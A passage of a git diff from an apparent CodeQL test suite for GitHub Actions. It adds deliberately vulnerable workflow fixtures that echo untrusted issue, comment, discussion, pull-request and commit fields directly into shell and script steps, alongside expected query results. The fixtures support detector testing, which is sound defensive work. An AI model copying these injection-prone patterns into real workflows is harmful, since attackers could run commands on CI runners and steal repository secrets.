ste ... utput}} | semmle.label | ${{ ste ... utput}} | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | id: step1 [step-output] | semmle.label | id: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:27:24:27:48 | ${{ inp ... path }} | semmle.label | ${{ inp ... path }} | +subpaths +#select +| .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:16:11:51 | ${{ job ... put1 }} | Summary | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref new file mode 100644 index 000000000000..ff87d53c3d69 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.qlref @@ -0,0 +1,2 @@ +Security/CWE-020/ReusableWorkflowsSummaries.ql + diff --git a/ql/src/test/composite-actions/action.yml b/ql/test/query-tests/Security/CWE-020/action1/action.yml similarity index 99% rename from ql/src/test/composite-actions/action.yml rename to ql/test/query-tests/Security/CWE-020/action1/action.yml index c43d5fd66946..787fb9f588be 100644 --- a/ql/src/test/composite-actions/action.yml +++ b/ql/test/query-tests/Security/CWE-020/action1/action.yml @@ -48,3 +48,4 @@ runs: TAINTED: ${{ steps.changed-files.outputs.all_changed_files }} + diff --git a/ql/src/test/.github/workflows/argus_case_study.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml similarity index 100% rename from ql/src/test/.github/workflows/argus_case_study.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml diff --git a/ql/src/test/.github/workflows/changed-files.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml similarity index 100% rename from ql/src/test/.github/workflows/changed-files.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml new file mode 100644 index 000000000000..17ead9fdd204 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml @@ -0,0 +1,28 @@ +on: issue_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' + + echo-chamber2: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.comment.body }}' + - run: echo '${{ github.event.issue.body }}' + - run: echo '${{ github.event.issue.title }}' + + echo-chamber3: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v3 + with: + script: console.log('${{ github.event.comment.body }}') + - uses: actions/github-script@v3 + with: + script: console.log('${{ github.event.issue.body }}') + - uses: actions/github-script@v3 + with: + script: console.log('${{ github.event.issue.title }}') \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml new file mode 100644 index 000000000000..0a64e47f6cba --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml @@ -0,0 +1,10 @@ +on: issue_comment + +# same as comment_issue but this file ends with a line break + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml similarity index 100% rename from ql/src/test/.github/workflows/cross1.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml similarity index 100% rename from ql/src/test/.github/workflows/cross2.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml diff --git a/ql/src/test/.github/workflows/cross3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml similarity index 100% rename from ql/src/test/.github/workflows/cross3.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml new file mode 100644 index 000000000000..fdb140ec3802 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml @@ -0,0 +1,8 @@ +on: discussion + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml new file mode 100644 index 000000000000..649d3a6e1319 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml @@ -0,0 +1,9 @@ +on: discussion_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.discussion.title }}' + - run: echo '${{ github.event.discussion.body }}' + - run: echo '${{ github.event.comment.body }}' \ No newline at end of file diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml new file mode 100644 index 000000000000..a952c8c1ab85 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml @@ -0,0 +1,11 @@ +on: gollum + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.pages[1].title }}' + - run: echo '${{ github.event.pages[11].title }}' + - run: echo '${{ github.event.pages[0].page_name }}' + - run: echo '${{ github.event.pages[2222].page_name }}' + - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe \ No newline at end of file diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml similarity index 100% rename from ql/src/test/.github/workflows/image_link_generator.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml diff --git a/ql/src/test/.github/workflows/inter-job.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml similarity index 100% rename from ql/src/test/.github/workflows/inter-job.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml b/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml new file mode 100644 index 000000000000..5e767ce0239f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml @@ -0,0 +1,20 @@ +on: issues + +env: + global_env: ${{ github.event.issue.title }} + test: test + +jobs: + echo-chamber: + env: + job_env: ${{ github.event.issue.title }} + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.issue.title }}' + - run: echo '${{ github.event.issue.body }}' + - run: echo '${{ env.global_env }}' + - run: echo '${{ env.test }}' + - run: echo '${{ env.job_env }}' + - run: echo '${{ env.step_env }}' + env: + step_env: ${{ github.event.issue.title }} diff --git a/ql/src/test/.github/workflows/matrix.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml similarity index 100% rename from ql/src/test/.github/workflows/matrix.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml diff --git a/ql/src/test/.github/workflows/no-flow1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml similarity index 100% rename from ql/src/test/.github/workflows/no-flow1.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml diff --git a/ql/src/test/.github/workflows/no-flow2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml similarity index 100% rename from ql/src/test/.github/workflows/no-flow2.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml new file mode 100644 index 000000000000..d4ce78856694 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml @@ -0,0 +1,14 @@ +on: pull_request_review + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.event.review.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml new file mode 100644 index 000000000000..5d288caad85d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml @@ -0,0 +1,14 @@ +on: pull_request_review_comment + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.event.comment.body }}' diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml new file mode 100644 index 000000000000..215b32528853 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml @@ -0,0 +1,16 @@ +on: pull_request_target + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.issue.title }}' # not defined + - run: echo '${{ github.event.issue.body }}' # not defined + - run: echo '${{ github.event.pull_request.title }}' + - run: echo '${{ github.event.pull_request.body }}' + - run: echo '${{ github.event.pull_request.head.label }}' + - run: echo '${{ github.event.pull_request.head.repo.default_branch }}' + - run: echo '${{ github.event.pull_request.head.repo.description }}' + - run: echo '${{ github.event.pull_request.head.repo.homepage }}' + - run: echo '${{ github.event.pull_request.head.ref }}' + - run: echo '${{ github.head_ref }}' diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml new file mode 100644 index 000000000000..2006a7999daf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml @@ -0,0 +1,16 @@ +on: push + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.commits[11].message }}' + - run: echo '${{ github.event.commits[11].author.email }}' + - run: echo '${{ github.event.commits[11].author.name }}' + - run: echo '${{ github.event.head_commit.message }}' + - run: echo '${{ github.event.head_commit.author.email }}' + - run: echo '${{ github.event.head_commit.author.name }}' + - run: echo '${{ github.event.head_commit.committer.email }}' + - run: echo '${{ github.event.head_commit.committer.name }}' + - run: echo '${{ github.event.commits[11].committer.email }}' + - run: echo '${{ github.event.commits[11].committer.name }}' \ No newline at end of file diff --git a/ql/src/test/.github/workflows/simple1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml similarity index 100% rename from ql/src/test/.github/workflows/simple1.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml similarity index 100% rename from ql/src/test/.github/workflows/simple2.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml diff --git a/ql/src/test/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml similarity index 100% rename from ql/src/test/.github/workflows/test.yml rename to ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml new file mode 100644 index 000000000000..60e7645f60fe --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml @@ -0,0 +1,16 @@ +on: + workflow_run: + workflows: [test] + +jobs: + echo-chamber: + runs-on: ubuntu-latest + steps: + - run: echo '${{ github.event.workflow_run.display_title }}' + - run: echo '${{ github.event.workflow_run.head_commit.message }}' + - run: echo '${{ github.event.workflow_run.head_commit.author.email }}' + - run: echo '${{ github.event.workflow_run.head_commit.author.name }}' + - run: echo '${{ github.event.workflow_run.head_commit.committer.email }}' + - run: echo '${{ github.event.workflow_run.head_commit.committer.name }}' + - run: echo '${{ github.event.workflow_run.head_branch }}' + - run: echo '${{ github.event.workflow_run.head_repository.description }}' diff --git a/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected new file mode 100644 index 000000000000..55075b7baf3b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/CriticalExpressionInjection.expected @@ -0,0 +1,227 @@ +edges +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | .github/workflows/changed-files.yml:21:14:24:15 | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | +| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | +| .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | +| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | id: step0 [value] | +| .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | +| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | id: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | +| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | id: step2 [test] | +nodes +| .github/workflows/argus_case_study.yml:15:9:24:6 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | +| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | +| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:16:9:20:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | +| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:27:7:37:4 | name: R ... g chars [replaced] | semmle.label | name: R ... g chars [replaced] | +| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | +| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | +| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | +| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | +| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/image_link_generator.yml:15:9:22:6 | name: E ... ial URL [initial_url] | semmle.label | name: E ... ial URL [initial_url] | +| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:22:9:28:6 | name: G ... bugging [redirected_url] | semmle.label | name: G ... bugging [redirected_url] | +| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:28:9:35:6 | name: T ... ter PNG [trimmed_url] | semmle.label | name: T ... ter PNG [trimmed_url] | +| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/inter-job.yml:8:7:10:4 | job_out ... alue }} [job_output] | semmle.label | job_out ... alue }} [job_output] | +| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job.yml:15:9:19:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/inter-job.yml:19:9:27:2 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | +| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | +| .github/workflows/matrix.yml:15:7:16:4 | matrix: ... iles }} [matrix] | semmle.label | matrix: ... iles }} [matrix] | +| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/matrix.yml:17:9:21:2 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | +| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | +| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | +| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | +| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | +| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | +| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | +| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | +| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | +| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | +| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | +| .github/workflows/simple1.yml:8:9:14:6 | id: summary [value] | semmle.label | id: summary [value] | +| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | semmle.label | ${{ git ... sage }} | +| .github/workflows/simple1.yml:15:14:16:50 | \| | semmle.label | \| | +| .github/workflows/simple2.yml:14:9:18:6 | name: G ... d files | semmle.label | name: G ... d files | +| .github/workflows/simple2.yml:18:9:26:6 | name: R ... d files [value] | semmle.label | name: R ... d files [value] | +| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/simple2.yml:28:14:31:15 | \| | semmle.label | \| | +| .github/workflows/test.yml:8:7:10:4 | job_out ... test }} [job_output] | semmle.label 